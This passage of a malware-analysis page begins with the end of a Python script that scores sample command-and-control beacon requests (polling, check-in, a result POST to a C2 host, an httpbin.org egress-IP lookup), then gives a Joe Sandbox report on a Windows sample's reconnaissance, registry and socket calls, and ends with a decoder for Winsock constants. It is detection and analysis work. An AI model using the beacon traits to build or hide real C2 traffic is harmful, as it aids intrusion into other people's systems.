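    "result": build_request("POST", C2_PATH, C2_HOST, json.dumps({"id1": "0", "data": "Done1"})),
    "benign": build_request("GET", "/index.html", "www.example.com",
                            extra=("User-Agent: Mozilla/5.0",)),
}

if __name__ == "__main__":
    for name, raw in SAMPLE_REQUESTS.items():
        print(f"{name:10} {assess(raw)}")
    print("egress IP reused in check-in:", egress_ip_reused(ECHO_RESPONSE_BODY, PROFILE_BODY))
```

All four requests from the capture score as suspicious (the polling GET and the "Done1" POST on the absence of a User-Agent plus the epoch-like path, the check-in additionally on its profile keys, the httpbin.org lookup on the echo-host match), while the control request with a User-Agent to an ordinary host produces no reasons. The egress-IP correlation is what ties the otherwise benign-looking httpbin.org request to the beacon: the same address comes back in the first POST body.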



                                  Target ID:0
                                  Start time:03:50:56
                                  Start date:31/12/2024
                                  Path:C:\Users\user\Desktop\r8nllkNEQX.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\r8nllkNEQX.exe"
                                  Imagebase:0x2d0000
                                  File size:4'509'696 bytes
                                  MD5 hash:5D07283413428B07167FBCDBB4063558
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:2.9%
                                    Dynamic/Decrypted Code Coverage:18%
                                    Signature Coverage:11.3%
                                    Total number of Nodes:715
                                    Total number of Limit Nodes:107
                                    execution_graph: interactive node/edge rendering (715 nodes, 107 limit nodes); the serialized node list is not reproduced here. Windows API calls referenced by the graph nodes: getsockname, select, __WSAFDIsSet, socket, ioctlsocket, connect, closesocket, send, recv, recvfrom, setsockopt, WSAIoctl, WSAStartup, WSAEventSelect, WSAEnumNetworkEvents, WSACloseEvent, WSAGetLastError, gethostname, if_nametoindex, if_indextoname, GetBestRoute2, SleepEx, Process32FirstW, Process32NextW, QueryFullProcessImageNameA, CloseHandle, GetSystemInfo, GlobalMemoryStatusEx, GetLogicalDrives, GetDriveTypeA, GetDiskFreeSpaceExA, FindFirstFileA, FindFirstFileW, FindNextFileW, RegOpenKeyExA, RegQueryValueExA, RegEnumKeyExA, RegCloseKey, CharUpperA, KiUserCallbackDispatcher. C runtime functions referenced: _open, islower, vfprintf.
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                    • API String ID: 0-1590685507
                                    • Opcode ID: bf3e10c50d33ee0191800c39bff7de0ace8ddfa8a2581b22716b3f83074f1a4d
                                    • Instruction ID: b93861becbdca7736ede7b1eafd139e3839f146c132597e787049d962af42ccc
                                    • Opcode Fuzzy Hash: bf3e10c50d33ee0191800c39bff7de0ace8ddfa8a2581b22716b3f83074f1a4d
                                    • Instruction Fuzzy Hash: C8C2C131A043449FD729CF29C494B6AB7E1BF88314F05C66DEC989B6A2D771ED84CB81

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph for the function at 2d255d (blocks 2d255d through 2d29fe): interactive rendering; the serialized block list is not reproduced here. Blocks call GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW and FindNextFileW, the internal routines 659f70, 7a1cf0, 7a1ee0, 7a1af0, 7a1dc0, 7a1e50, 7a1be0, 7a0250, 658e38, 658be0, 658bd0, 658b98, 658e78 and 65a2b0, and, from the call site at 2d2619, one of 27 alternative targets in the 70a0970-70a0cff range.
                                    APIs
                                    • GetSystemInfo.KERNELBASE ref: 002D2579
                                    • GlobalMemoryStatusEx.KERNELBASE ref: 002D25CC
                                    • GetDriveTypeA.KERNELBASE ref: 002D2647
                                    • GetDiskFreeSpaceExA.KERNELBASE ref: 002D267E
                                    • KiUserCallbackDispatcher.NTDLL ref: 002D27E2
                                    • FindFirstFileW.KERNELBASE ref: 002D28F8
                                    • FindNextFileW.KERNELBASE ref: 002D291F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                    • String ID: ;%-$@$`
                                    • API String ID: 3271271169-2524062253
                                    • Opcode ID: 762589b1c0bdb5b449eda966cb3c5be521592f9bfb521c0e294d4ba900a1e99d
                                    • Instruction ID: c0b4f3d83ffde3611003bc5ba48cc2a2baf00dcbd46fc04c0f6eae9f4f9e8e2a
                                    • Opcode Fuzzy Hash: 762589b1c0bdb5b449eda966cb3c5be521592f9bfb521c0e294d4ba900a1e99d
                                    • Instruction Fuzzy Hash: 02D1C3B4904309DFDB10EFA8C58569EBBF1BF88344F408969E898D7341E7349A88CF52

                                    Control-flow Graph (rendered graph not reproduced)
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Similarity
                                    • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                    • String ID: 0
                                    • API String ID: 2406880114-4108050209
                                    • Opcode ID: 2c550d596b50a4b5e43a6cfbe15c89b737aa51f4b0e05cd72b6485ca5de80485
                                    • Instruction ID: 754948737114ebd9f6b877f34bab3e0cde05227b36b30dd6d8bbf8e76f4656d6
                                    • Opcode Fuzzy Hash: 2c550d596b50a4b5e43a6cfbe15c89b737aa51f4b0e05cd72b6485ca5de80485
                                    • Instruction Fuzzy Hash: B6E1F4B0904309DFCB50EFA8D98569EBBF5EF94344F40896AE888D7350EB749948CF42

                                    Control-flow Graph (rendered graph not reproduced)
                                    APIs
                                    • WSAEventSelect.WS2_32(?,?,?), ref: 002E0712
                                    • WSAEventSelect.WS2_32(?,?,00000000), ref: 002E09DC
                                    • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 002E09FC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Similarity
                                    • API ID: EventSelect$EnumEventsNetwork
                                    • String ID: N=-$multi.c
                                    • API String ID: 2170980988-3986511460
                                    • Opcode ID: b8bc8424fbaa25a9c763386d1e664ce82894699f21ad99b4b043e55758a8ed44
                                    • Instruction ID: 2700123548f9cb23262d8ad9a1a359926551ec627ad6b76aff9393091789e9ef
                                    • Opcode Fuzzy Hash: b8bc8424fbaa25a9c763386d1e664ce82894699f21ad99b4b043e55758a8ed44
                                    • Instruction Fuzzy Hash: B1D1F7716683869FE710CF61C8C1B6BB7E5FF94304F44482DF98486252E3B4E9A6CB52

                                    Control-flow Graph (rendered graph not reproduced)
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Similarity
                                    • Opcode ID: 443efe3c61ee7e7639562c9fb8e5c7392fd26303edec835a2860b12f5130a140
                                    • Instruction ID: 11b8be1b8ecf7172a080d2bd3743785c98c3a1534b946cab83515d2a30651f50
                                    • Opcode Fuzzy Hash: 443efe3c61ee7e7639562c9fb8e5c7392fd26303edec835a2860b12f5130a140
                                    • Instruction Fuzzy Hash: 2C91033066C38A8BD7358E2AC8907BB72D5EFD4360F948B2CE898471D4E7709D619691

                                    Control-flow Graph (rendered graph not reproduced)
                                    APIs
                                    • getsockname.WS2_32(-00000020,-00000020,?), ref: 0039B2B6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Similarity
                                    • API ID: getsockname
                                    • String ID: ares__sortaddrinfo.c$cur != NULL
                                    • API String ID: 3358416759-2430778319
                                    • Opcode ID: fa92253e290be236cac3304618de219c25342cbd177539af62483c9bc0025d6d
                                    • Instruction ID: 48ffb71249ec18f14bdda6164a6097f3182345e213cfee0486b0866558bc0bab
                                    • Opcode Fuzzy Hash: fa92253e290be236cac3304618de219c25342cbd177539af62483c9bc0025d6d
                                    • Instruction Fuzzy Hash: EDC171316043159FDB19DF24DA80A6AB7E1FF89704F06896CF8898B3A1D730ED45CB81
                                    APIs
                                    • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0038712E,?,?,?,00001001,00000000), ref: 0039A90D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Similarity
                                    • API ID: recvfrom
                                    • String ID:
                                    • API String ID: 846543921-0
                                    • Opcode ID: d3bdf1837bb3cc0f2a1d128bdc7033975b2852ffe41a8c9d996ea64f2792ebe1
                                    • Instruction ID: d7c726fa1606c00f83c80b9c1a384acd5aecdfe9c411ccae66dc7106606f633c
                                    • Opcode Fuzzy Hash: d3bdf1837bb3cc0f2a1d128bdc7033975b2852ffe41a8c9d996ea64f2792ebe1
                                    • Instruction Fuzzy Hash: D1F06D7511830CAFD6109E01DC44D6BBBEDFFC9768F06465DF948232118370AE10DAB2
                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0038AA19
                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0038AA4C
                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0038AA97
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0038AAE9
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0038AB30
                                    • RegCloseKey.KERNELBASE(?), ref: 0038AB6A
                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0038AB82
                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0038AC46
                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0038AD0A
                                    • RegEnumKeyExA.KERNELBASE ref: 0038AD8D
                                    • RegCloseKey.KERNELBASE(?), ref: 0038ADD9
                                    • RegEnumKeyExA.KERNELBASE ref: 0038AE08
                                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0038AE2A
                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0038AE54
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0038AF63
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0038AFB2
                                    • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0038B072
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: QueryValue$Open$CloseEnum
                                    • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                    • API String ID: 4217438148-1047472027
                                    • Opcode ID: 2589684b3008450cc199f3ebfcf777fdcd495cee12a15bcc6bbc4b59e7943f1a
                                    • Instruction ID: 4909ce687eff76f6906d26098de8e3169ab2e4ea577ec319399c4553d204cb67
                                    • Opcode Fuzzy Hash: 2589684b3008450cc199f3ebfcf777fdcd495cee12a15bcc6bbc4b59e7943f1a
                                    • Instruction Fuzzy Hash: 6D72EFB1608301AFE711EB24CC82F6BB7E8AF85740F154829F985DB291E774E945CB63
                                    APIs
                                    • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0030A831
                                    Strings
                                    • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0030AD0A
                                    • @, xrefs: 0030A8F4
                                    • Couldn't bind to '%s' with errno %d: %s, xrefs: 0030AE1F
                                    • bind failed with errno %d: %s, xrefs: 0030B080
                                    • cf_socket_open() -> %d, fd=%d, xrefs: 0030A796
                                    • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0030A6CE
                                    • Name '%s' family %i resolved to '%s' family %i, xrefs: 0030ADAC
                                    • Trying %s:%d..., xrefs: 0030A7C2, 0030A7DE
                                    • Bind to local port %d failed, trying next, xrefs: 0030AFE5
                                    • Trying [%s]:%d..., xrefs: 0030A689
                                    • Local port: %hu, xrefs: 0030AF28
                                    • Local Interface %s is ip %s using address family %i, xrefs: 0030AE60
                                    • cf-socket.c, xrefs: 0030A5CD, 0030A735
                                    • Could not set TCP_NODELAY: %s, xrefs: 0030A871
                                    • @, xrefs: 0030AC42
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: setsockopt
                                    • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                    • API String ID: 3981526788-2373386790
                                    • Opcode ID: 61deb92ed99163a6225bcb0bad53967d8c270c1c1ffc4e0a427f9dfdcb69cb16
                                    • Instruction ID: b68b3fe2b4e50aa2f172533e5e9ccca74c8d5e16b7eeab4be3b16400b0bb88ea
                                    • Opcode Fuzzy Hash: 61deb92ed99163a6225bcb0bad53967d8c270c1c1ffc4e0a427f9dfdcb69cb16
                                    • Instruction Fuzzy Hash: 79620371509741ABE722CF24D852FABB3E8FF85304F054929F98897292E771E845CB93

                                    Control-flow Graph

                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00399946
                                    • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00399974
                                    • RegCloseKey.KERNELBASE(?), ref: 0039998B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                    • API String ID: 3677997916-615551945
                                    • Opcode ID: 5e7783527b547a2a82ca48e8012dc40cf44bc79def49e7d6d46048f8a7b3473c
                                    • Instruction ID: ef1e632ea9d6a4743ac495ed772c1f2fb83fce5bbdfffa10d469cbb9ef58f291
                                    • Opcode Fuzzy Hash: 5e7783527b547a2a82ca48e8012dc40cf44bc79def49e7d6d46048f8a7b3473c
                                    • Instruction Fuzzy Hash: FF32A6B5904301ABEF13AB28EC42B1B7698AF55354F094879FC099A263F731ED15C793

                                    Control-flow Graph

                                    APIs
                                    • connect.WS2_32(?,?,00000001), ref: 00308C30
                                    • SleepEx.KERNELBASE(00000000,00000000), ref: 00308CF3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: Sleepconnect
                                    • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                    • API String ID: 238548546-879669977
                                    • Opcode ID: 3ffe9371a5372a38d93c3abc33d8d48d6c3a50b89b86ee5465512fe0684b160c
                                    • Instruction ID: 0fe857fef83c887ec94dc6a3e7633a8119ccca0f6713fbfb4c95e2ae5964dfb8
                                    • Opcode Fuzzy Hash: 3ffe9371a5372a38d93c3abc33d8d48d6c3a50b89b86ee5465512fe0684b160c
                                    • Instruction Fuzzy Hash: FDB1F470605346EFD716CF24C895BA7B7E4AF55328F048A2CE8998B2D2DB70EC54CB61

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: CloseEnumOpen
                                    • String ID: d
                                    • API String ID: 1332880857-2564639436
                                    • Opcode ID: bc3906bee84a2f55d39c918e80943435b3f326625209a65f577448714813fe71
                                    • Instruction ID: 5a9b50700b567fa5334d75e24d474be62c6fe91236c3ddd11a92b66a461c2a44
                                    • Opcode Fuzzy Hash: bc3906bee84a2f55d39c918e80943435b3f326625209a65f577448714813fe71
                                    • Instruction Fuzzy Hash: 217191B490431ADFDB40DFA9C58479EBBF0FF85308F108959E99897311E7749A888F92

                                    Control-flow Graph (rendered graph not preserved): function 2d76a0, basic blocks 2d76a0-2d7762; API called: send; internal calls: 2d72a0, 2dcb20, 658c50
                                    APIs
                                    • send.WS2_32(multi.c,?,?,?,N=-,00000000,?,?,002E07BF), ref: 002D76EA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: the same seventeen associated memory dumps listed for the first function in this section
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: send
                                    • String ID: LIMIT %s:%d %s reached memlimit$N=-$SEND %s:%d send(%lu) = %ld$multi.c$send
                                    • API String ID: 2809346765-3403203552
                                    • Opcode ID: 62ce90c9c72c3dbb3d535365638e657ee5a6f0a53c7145b5470d04af1b7c57fe
                                    • Instruction ID: 4a39564b08cc232a74180865a5c20831b4b6c3a31c7a046ae9bdc10f9641fc66
                                    • Opcode Fuzzy Hash: 62ce90c9c72c3dbb3d535365638e657ee5a6f0a53c7145b5470d04af1b7c57fe
                                    • Instruction Fuzzy Hash: F9113DB0A193057BE120AF649C46E677B6CEBC6B28F040A1AFD0463353F269DC21C6B1

                                    Control-flow Graph (rendered graph not preserved): function 309290, basic blocks 309290-309470; APIs called: WSAIoctl, setsockopt; internal calls: 2d76a0 (the send wrapper above), 2ed090, 2ed8c0, 2ed9a0, 314f40, 3150a0
                                    APIs
                                    • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0030935C
                                    • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00309388
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: the same seventeen associated memory dumps listed for the first function in this section
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: Ioctlsetsockopt
                                    • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                    • API String ID: 1903391676-2691795271
                                    • Opcode ID: 3e8aa00cfbde2ac8b43befa9649da947c8a22d30eaba5aa3db197d24ccf748c0
                                    • Instruction ID: 43ea83007ac24017e03169a8f12653ee0fb33be20adfdb26b2aed800c8f6cce0
                                    • Opcode Fuzzy Hash: 3e8aa00cfbde2ac8b43befa9649da947c8a22d30eaba5aa3db197d24ccf748c0
                                    • Instruction Fuzzy Hash: F4510174604305ABD712DF24C891FAAB7A5FF88314F15856AFD488B2D3E730E992CB91
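The hexadecimal arguments in the API lines of this section (WSAIoctl with 4004747B, setsockopt with 0000FFFF/00001001, ioctlsocket with 8004667E further down, WSAStartup with 00000202) are raw Winsock constants. The decoder below is an added example written for this page, not part of the Joe Sandbox report: its constant tables are a hand-picked subset of winsock2.h and mstcpip.h values (anything outside them is reported as unknown rather than guessed), and the four sample lines are copied from the report. It reads 4004747B as SIO_IDEAL_SEND_BACKLOG_QUERY and the setsockopt pair as SOL_SOCKET/SO_SNDBUF; that sequence, in a function whose strings name cf-socket.c, matches libcurl's Windows send-buffer tuning and is consistent with a statically linked libcurl (the editor's reading of the strings, not a finding the report itself makes).

```python
"""Decode the raw Winsock constants printed in Joe Sandbox API lines.

Added example (editor's code, not part of the report). The tables are a
small hand-picked subset of winsock2.h / mstcpip.h; unknown codes are
labelled "unknown", never guessed.
"""
import re

# Layout of a Windows ioctl code (_IO/_IOR/_IOW macros in winsock2.h):
# bits 29-31 direction, bits 16-22 parameter size, bits 8-15 group char, bits 0-7 number.
IOCPARM_MASK = 0x7F
IOC_VOID, IOC_OUT, IOC_IN = 0x20000000, 0x40000000, 0x80000000
IOC_INOUT = IOC_IN | IOC_OUT
DIRECTIONS = {IOC_VOID: "none", IOC_OUT: "read", IOC_IN: "write", IOC_INOUT: "read/write"}

KNOWN_IOCTLS = {
    0x8004667E: "FIONBIO",                        # _IOW('f', 126, u_long): non-blocking mode
    0x4004667F: "FIONREAD",                       # _IOR('f', 127, u_long)
    0x40047307: "SIOCATMARK",                     # _IOR('s', 7, u_long)
    0x4004747B: "SIO_IDEAL_SEND_BACKLOG_QUERY",   # _IOR('t', 123, ULONG), mstcpip.h
    0x2000747A: "SIO_IDEAL_SEND_BACKLOG_CHANGE",  # _IO('t', 122), mstcpip.h
}
SOCKOPT_LEVELS = {0xFFFF: "SOL_SOCKET", 0x0006: "IPPROTO_TCP"}
SOCKOPT_NAMES = {
    ("SOL_SOCKET", 0x0004): "SO_REUSEADDR",
    ("SOL_SOCKET", 0x0008): "SO_KEEPALIVE",
    ("SOL_SOCKET", 0x1001): "SO_SNDBUF",
    ("SOL_SOCKET", 0x1002): "SO_RCVBUF",
    ("IPPROTO_TCP", 0x0001): "TCP_NODELAY",
}

# Constructed sample input: the four API lines copied from this report.
REPORT_API_LINES = [
    "• WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0030935C",
    "• setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00309388",
    "• ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0039ABE3",
    "• WSAStartup.WS2_32(00000202), ref: 002ED65B",
]
API_LINE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$")


def decode_ioctl(code: int) -> dict:
    """Split an ioctl code into its bit fields and name it when known."""
    return {
        "name": KNOWN_IOCTLS.get(code, "unknown"),
        "direction": DIRECTIONS.get(code & 0xE0000000, "?"),
        "size": (code >> 16) & IOCPARM_MASK,
        "group": chr((code >> 8) & 0xFF),
        "number": code & 0xFF,
    }


def decode_sockopt(level: int, optname: int) -> str:
    """Name a setsockopt level/optname pair, falling back to the raw values."""
    lvl = SOCKOPT_LEVELS.get(level, f"level 0x{level:X}")
    opt = SOCKOPT_NAMES.get((lvl, optname), f"opt 0x{optname:X}")
    return f"{lvl}/{opt}"


def decode_wsa_version(word: int) -> tuple:
    """WSAStartup takes MAKEWORD(major, minor): major is the low byte."""
    return (word & 0xFF, (word >> 8) & 0xFF)


def parse_api_line(line: str):
    """Return (api name, argument tokens, call-site address) for one report line."""
    m = API_LINE.match(line.strip().lstrip("•").strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    return m.group("api"), m.group("args").split(","), int(m.group("ref"), 16)


def _hex_or_none(tok: str):
    """Unresolved arguments appear as '?' or as a string (e.g. multi.c); only 8-digit hex counts."""
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None


def annotate_api_line(line: str) -> str:
    """Rewrite a report API line with its constants decoded."""
    api, args, ref = parse_api_line(line)
    ints = [_hex_or_none(a) for a in args]
    note = "no decodable constants"
    if api in ("WSAIoctl", "ioctlsocket") and len(ints) > 1 and ints[1] is not None:
        d = decode_ioctl(ints[1])
        note = (f"code=0x{ints[1]:08X} {d['name']} ({d['direction']}, "
                f"{d['size']}-byte arg, group '{d['group']}', number {d['number']})")
    elif api == "setsockopt" and len(ints) > 2 and None not in ints[1:3]:
        note = decode_sockopt(ints[1], ints[2])
    elif api == "WSAStartup" and ints and ints[0] is not None:
        major, minor = decode_wsa_version(ints[0])
        note = f"requested Winsock {major}.{minor}"
    return f"{ref:08X} {api}: {note}"


if __name__ == "__main__":
    for report_line in REPORT_API_LINES:
        print(annotate_api_line(report_line))
```

Run as a script it prints one decoded line per report line; the same functions can be fed any API line copied from other entries of the report, and arguments the sandbox could not resolve (printed as `?`) are skipped rather than misread as zero.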

